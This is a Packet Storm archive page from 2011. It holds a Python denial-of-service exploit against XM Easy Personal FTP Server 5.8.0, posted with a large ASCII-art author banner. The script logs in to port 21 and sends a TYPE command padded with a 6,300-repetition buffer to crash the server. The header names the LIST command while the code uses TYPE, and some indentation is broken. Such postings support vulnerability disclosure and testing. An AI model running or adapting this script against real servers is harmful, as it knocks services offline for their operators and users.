exploit the possibilities

XM Easy Personal FTP Server 5.8.0 Denial Of Service

XM Easy Personal FTP Server 5.8.0 Denial Of Service
Posted Feb 10, 2011
Authored by Houssam Sahli

XM Easy Personal FTP Server version 5.8.0 (TYPE) denial of service exploit.

tags | exploit, denial of service
MD5 | 01342c8a4978733684f113c678a3cb08

XM Easy Personal FTP Server 5.8.0 Denial Of Service

Change Mirror Download
#!/usr/bin/python
#
# Exploit Title : XM Easy Personal FTP Server 5.8.0 Denial Of Service LIST command
# Date: 10/02/2011
# Author: Houssam Sahli
# Software Link: http://www.dxm2008.com/data/ftpserversetup.exe
# Version: 5.8.0
# Tested on: Windows XP SP3 French

#!/usr/bin/python
print "\n2ctUtjjJUJUJUJUJjJUJtJtJUUtjfUtt2UftftfUftft1t1tFfF21fhf11Ft"
print "ULcYLYLYLcLc7LLcLccJcJYJYJYjJtJjJtjtJtJtUtjUJjJUJtJUJtjtUtUj"
print "tLUJjJJcJcJcJcJYjhPX0Pb99pb9EbMEDEDEMDZbZDD0XfFf1f2tFf22F21U"
print "JYJJcJcJcJcJcJcJ2 1hf1f1f1212h2h1f"
print "ULJcJcJLYLL7L7L71 Houssam Sahli 1h1f2f2fFt1fF1Ft"
print "ULJcJcJLYLL7L7L71 backtronux@gmail.com 1h1f2f2fFt1fF1Ft"
print "JccJcY7Lr7777LrLY 1ht2t1t1f1t12F12"
print "J7JLcr7r777777L7cUF1hfU7r:i:i:i:rirrj2MRQMMbhf1t2t1tFf1f1tFU"
print "Y7cLr777r7rrrrrrrLr:, .LPRQQQQQQQQDX7:.:7SpXfFt1f1t121th2Fft"
print "J7crc77rriririri: ,:tQQQQQQQQQQQQQQQQQRJ:,i19FFf1t2f2f21hfFU"
print "Y7r777rrii:i::: JQQQQQQPFfS0MM02hftXQRZPc, ipXSf1t2t1t1fF2f"
print "Jr777rrii::::, ,QQQQQQQi..::::i:irRR.,hfL7L: JpSf1tFt12h1Ft"
print "cr7c77rri::: 7QQQQQQQ1:Et7jjJ7Lrr7r. ci::i7. iPS22fFf12F12"
print "Jr7LLrrir:i EQQQQQQQQr:QQQQQ9L7Lri., i.::rtY :hSf1f121fFU"
print "c7rL77rrrr. DQQQQQQQQQ:::riri77c77i. .ri7LfE9 ihh2Ffhfhf2"
print "j7crc77r7i UQQQjrir:rQQFcii:ii77Lrr., f11PpZQZ.JFF1h2F1hf"
print "JLcLrLLLL..QQQc.irr7i0QQQQQMhUrr7Lrr:., :Q9QQQQQQh:1t2tft1f2"
print "J7Jcc7LLJ cQQQQL:i777irUMQQQQQQL77L77rr:pJ:7PQQQQQ:Jhf1tFt2J"
print "JccJcc7c7 2QQQQQE7:r7Lri:r7hDQQQ7LLYLJLc7rrr::XQQQ.jFF1h1h11"
print "tLjJJcJJJ bQQQQQQQRULr77Lrriii7LcLYLYLYLLLc77:cQQQ7cX2h2h2hf"
print "jJJUJjJtY 0QQQQQQQQQ0Mt7rrr777777L7LLcLc7c77::ZQQQJJFh2h2FF1"
print "tLUjjYUjt,tQQQQQQQS .QQQF7iiirr77L7L7L77ii:LMQQQQ72S1h1h1Sf"
print "tjjtjjJff:.QQQQQQQQ ::QQQMpftJc7c77rriLhQQQQQQf:02h1h1F12"
print "2J2UfUttFJ,Q: QQb YQQQQQQQQQQQQQQQQQQQQQQ tXF2F1F2hU"
print "fjf2Uft2thrr :L, , QQQQQQQQQribF2h2F1h22"
print "FJ1t2t2t22hrt, , ,,, , tPJ7 :QQQQQQQQU:bS2h2hfF2h2"
print "tUt1t2f1t11SLS. ,,,,,,,,,,,,, .rt. QQQ1Sp1p2r9Xfh2h2F2h1F"
print "1J1t2t1t2t12SYhr ,,,,,,,,,,, .QQF. .tbS2F1F2F1F1hf"
print "ftf1f1f1t2f12Xt2L. ,,,,,,,,,,,,, fQf .fR0Ffh1h1h2h1F21"
print "hUFt1t1f2t2t1fXhFUL: , , , : .jRRSF2h2h1h1SFF2Sf"
print "2f2FfF2Ff12122fhFphhJ7:. ,:JpRR0212FFh1S1h2hFhF1"
print "hUF21fFf12Ffh2F2h1XX9X9SXffjUccLcJtfpERZESh1hFhFSFS1hFS1S1Sf\n"

print "\nYou need a valid account to succeed this DoS, but even anonymous can do it as long as it has permission to call TYPE command.\n"

import socket
import sys

def Usage():
print ("Usage: ./expl.py <host> <Username> <password>\n")
buffer= "./A" * 6300
def start(hostname, username, passwd):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] " + r
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] Send malicious string"
sock.send("TYPE %s\r\n" %buffer)
sock.close()

if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
start(hostname,username,passwd)
sys.exit(0)

Login or Register to add favorites

File Archive:

December 2021

 • Su
 • Mo
 • Tu
 • We
 • Th
 • Fr
 • Sa
 • 1
  Dec 1st
  18 Files
 • 2
  Dec 2nd
  11 Files
 • 3
  Dec 3rd
  23 Files
 • 4
  Dec 4th
  0 Files
 • 5
  Dec 5th
  0 Files
 • 6
  Dec 6th
  0 Files
 • 7
  Dec 7th
  0 Files
 • 8
  Dec 8th
  0 Files
 • 9
  Dec 9th
  0 Files
 • 10
  Dec 10th
  0 Files
 • 11
  Dec 11th
  0 Files
 • 12
  Dec 12th
  0 Files
 • 13
  Dec 13th
  0 Files
 • 14
  Dec 14th
  0 Files
 • 15
  Dec 15th
  0 Files
 • 16
  Dec 16th
  0 Files
 • 17
  Dec 17th
  0 Files
 • 18
  Dec 18th
  0 Files
 • 19
  Dec 19th
  0 Files
 • 20
  Dec 20th
  0 Files
 • 21
  Dec 21st
  0 Files
 • 22
  Dec 22nd
  0 Files
 • 23
  Dec 23rd
  0 Files
 • 24
  Dec 24th
  0 Files
 • 25
  Dec 25th
  0 Files
 • 26
  Dec 26th
  0 Files
 • 27
  Dec 27th
  0 Files
 • 28
  Dec 28th
  0 Files
 • 29
  Dec 29th
  0 Files
 • 30
  Dec 30th
  0 Files
 • 31
  Dec 31st
  0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close